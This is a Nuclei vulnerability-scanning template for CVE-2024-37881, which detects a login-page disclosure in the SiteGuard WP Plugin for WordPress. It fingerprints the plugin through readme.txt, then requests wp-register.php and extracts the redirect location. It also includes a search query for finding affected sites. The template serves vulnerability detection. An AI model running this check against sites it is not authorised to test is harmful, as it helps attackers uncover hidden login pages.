nuclei-templates/http/cves/2024/CVE-2024-37881.yaml

48 lines
1.6 KiB
YAML
Raw Normal View History

2024-06-26 13:14:14 +00:00
id: CVE-2024-37881
info:
name: SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure
author: securityforeveryone
severity: medium
description: |
The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37881
- https://jvn.jp/en/jp/JVN60331535/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/siteguard/siteguard-wp-plugin-176-login-page-disclosure
- https://www.usom.gov.tr/bildirim/tr-24-0726
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/siteguard/"
tags: cve,cve-2024,siteguard,wp-plugin
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt"
matchers:
- type: dsl
internal: true
dsl:
- 'status_code == 200'
- 'contains(body, "SiteGuard WP Plugin")'
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-register.php"
matchers:
- type: dsl
dsl:
- "!contains(tolower(location), 'wp-login.php')"
extractors:
- type: kval
kval:
- location
# digest: 490a004630440220626c7d016013362ce47d6c7477d4bbe7bc2b275ec56e1b302cfb114913e049b002207d3e94531b207d8af527042a27217c6f956d64dfa972af1fa649a6535966385e:922c64590222798bb761d5b6d8e72950